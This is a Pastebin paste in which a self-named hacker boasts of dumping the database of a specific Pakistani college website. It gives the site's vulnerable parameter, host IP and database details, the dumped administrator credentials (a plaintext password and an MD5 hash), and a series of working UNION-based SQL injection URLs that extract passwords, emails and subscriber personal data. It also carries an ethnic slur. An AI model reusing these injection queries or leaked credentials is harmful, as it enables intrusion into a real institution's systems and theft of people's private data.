Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ____ __ _ _ _____
- | _ \ ___ / _| | || | ____ |___ / _ __
- | | | | / _ \ | |_ | || |_ |_ / |_ \ | '__|
- | |_| | | __/ | _| |__ _| / / ___) | | |
- |____/ \___| |_| |_| /___| |____/ |_|
- _---------------------------------------------------------------_
- ---------------------------------------------------------------
- # Exploit Title:www.actmacollege.edu.pk DATABASE DUMPED !
- # Google Dork: Porkistan FUCKED !
- # Date: I WILL EXPLAIN LATER
- # Author: Def4z3r
- # Vulnerable Link 1 : http://www.actmacollege.edu.pk/cources.php?cms_id='3
- # Version: NEW GENERATION BOYZ 2012
- # Tested on: HACKERS TRACK
- # CVE : NO EXISTS
- _ _ _ _ _ _
- / \ | |__ ___ _ _| |_ | | | | ___ ___| |_
- / _ \ | '_ \ / _ \| | | | __| | |_| |/ _ \/ __| __|
- / ___ \| |_) | (_) | |_| | |_ | _ | (_) \__ \ |_
- /_/ \_\_.__/ \___/ \__,_|\__| |_| |_|\___/|___/\__|
- -------------------------------------------------------------
- # Trget : http://www.actmacollege.edu.pk
- # Host IP : 173.212.248.18
- # Web Server : Apache
- # Powered-by : PHP/5.2.17
- # Keyword Found : Master
- # Injection type : Integer
- # Version : MySQL v 5.0.92-community
- # User : actmacol_pak@localhost
- # Database : actmacol_pak
- _____ _ _ _ _ ____ _
- |_ _|_ _| |__ | | ___ | \ | | __ _ _ __ ___ ___ / ___|___ | |_ _ _ __ ___ _ __ ___
- | |/ _` | '_ \| |/ _ \ | \| |/ _` | '_ ` _ \ / _ \ | | / _ \| | | | | '_ ` _ \| '_ \/ __|
- | | (_| | |_) | | __/ | |\ | (_| | | | | | | __/ | |___ (_) | | |_| | | | | | | | | \__ \
- |_|\__,_|_.__/|_|\___| |_| \_|\__,_|_| |_| |_|\___| \____\___/|_|\__,_|_| |_| |_|_| |_|___/
- -----------------------------------------------------------------------------------------------------
- # Vulnerable Selected Column Count is 17
- # Vulnerable Valid String Column is 4
- # Target Vulnerable :Yes
- table name : actmacol_pak
- # Table Name :Columns
- ----------------------------
- # tbl_user :user_created user_updated user_login_count user_last_login user_active user_type user_pword user_email user_lname user_fname user_id
- # tbl_subscribe :email_verified email_unique_key email_subscribe email_email email_postcode_city email_street email_phone email_lname email_fname email_id
- # tbl_siteconfig :config_display_order config_active config_desc config_value config_name config_key config_id
- # tbl_photo :photo_album_cover media_type photo_display_order photo_updated photo_added photo_status photo_description photo_name photo_album_id photo_id
- # tbl_notice :news_deleted news_archive news_admin_id news_active news_display_order news_updated news_added news_date news_image news_content news_title news_id
- # tbl_newsletter :newsletter_attachedFile newsletter_added newsletter_sent_date newsletter_sent newsletter_content newsletter_title newsletter_id
- # tbl_news :news_deleted news_archive news_admin_id news_active news_display_order news_updated news_added news_date news_image news_content news_title news_id
- # tbl_jaarverslag :content_order content_updated content_added content_date content_archive content_active content_content content_title content_id
- # tbl_cms :cms_banner_id cms_type cms_subpage_allow cms_delete_allow cms_deleted cms_updated cms_added cms_active cms_display_order cms_content cms_slug
- cms_meta_description cms_meta_keyword cms_page_title cms_page_name cms_parent_id cms_id
- # tbl_banner :banner_added banner_default banner_filename banner_type banner_name banner_id
- # tbl_album :event_occurrence description album_deleted album_updated album_added album_active album_description album_name album_id
- # faq :curr_date faq_active date faq_deleted setorder answer question faq_id
- # diplomas :student_session program student_status student_registration diploma_images3 diploma_images2 diploma_images student_name diploma_id
- # blite5_users :usr_status usr_join_date usr_mail usr_pass usr_name usr_id
- # blite5_settings :set_fast set_value set_id
- # blite5_online :rtime usr_ip usr_name usr_id
- # blite5_lines :line_txt timestamp from_name from_id line_id
- _ _ _ _ _ _
- / \ __| |_ __ ___ (_)_ __ (_)___| |_ _ __ __ _| |_ ___ _ __
- / _ \ / _` | '_ ` _ \| | '_ \| / __| __| '__/ _` | __/ _ \| '__|
- / ___ \ (_| | | | | | | | | | | \__ \ |_| | | (_| | |_ (_) | |
- /_/ \_\__,_|_| |_| |_|_|_| |_|_|___/\__|_| \__,_|\__\___/|_|
- ------------------------------------------------------------------------
- FROM tbl_user
- ----------------------
- User name1: user_lname=Khan
- User name2: user_fname=Shakeel
- User id : 1
- User Email: [email protected]
- Password : admin
- FROM blite5_users
- ----------------------
- User name : mobina
- User id : 1
- Password : 4a6a9caf4af24093acbc98ab1748f1aa
- ____ _
- | _ \ __ _| |_ __ _ ____
- | | | |/ _` | __/ _` |_ /
- | |_| | (_| | |_ (_| |/ /
- |____/ \__,_|\__\__,_/___|
- ------------------------------------------
- # http://www.actmacollege.edu.pk/cources.php?cms_id=-3 union all select 1,2,3,schema_name,5,6,7,8,9,10,11,12,13,14,15,16,17 from information_schema.schemata--
- # http://www.actmacollege.edu.pk/cources.php?cms_id=-3 union all select 1,2,3,user(),5,6,7,8,9,10,11,12,13,14,15,16,17--
- # http://www.actmacollege.edu.pk/cources.php?cms_id=-3 union all select 1,2,3,database(),5,6,7,8,9,10,11,12,13,14,15,16,17--
- # http://www.actmacollege.edu.pk/cources.php?cms_id=-3 union all select 1,2,3,version(),5,6,7,8,9,10,11,12,13,14,15,16,17--
- # http://www.actmacollege.edu.pk/cources.php?cms_id=-3 union all select 1,2,3,concat(version(),0x3a,user(),0x3a,database()),5,6,7,8,9,10,11,12,13,14,15,16,17--
- # http://www.actmacollege.edu.pk/cources.php?cms_id=-3 union all select 1,2,3,concat(user_pword,0x3a,user_email),5,6,7,8,9,10,11,12,13,14,15,16,17 FROM tbl_user --
- # http://www.actmacollege.edu.pk/cources.php?cms_id=-3 union all select 1,2,3,concat(usr_name,0x3a,usr_pass),5,6,7,8,9,10,11,12,13,14,15,16,17 FROM blite5_users --
- # http://www.actmacollege.edu.pk/cources.php?cms_id=-3 union all select 1,2,3,group_concat(column_name),5,6,7,8,9,10,11,12,13,14,15,16,17 from information_schema.columns where table_schema=database()--
- # http://www.actmacollege.edu.pk/cources.php?cms_id=-3 union all select 1,2,3,concat(0x3c703e,email_verified,0x3c62723e,email_unique_key,0x3c62723e,email_subscribe,0x3c62723e,email_email,0x3c62723e,email_postcode_city,0x3c62723e,email_street,0x3c62723e,email_phone email_lname,0x3c62723e,email_fname,0x3c62723e,email_id ),5,6,7,8,9,10,11,12,13,14,15,16,17 FROM tbl_subscribe--
- ___ ____ _ _
- / _ \ / ___| ___ ___ _ _ _ __(_) |_ _ _
- | | | | \___ \ / _ \/ __| | | | '__| | __| | | |
- | |_| | ___) | __/ (__| |_| | | | | |_| |_| |
- \___/ |____/ \___|\___|\__,_|_| |_|\__|\__, |
- |___/
- ------------------------------------------------------
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement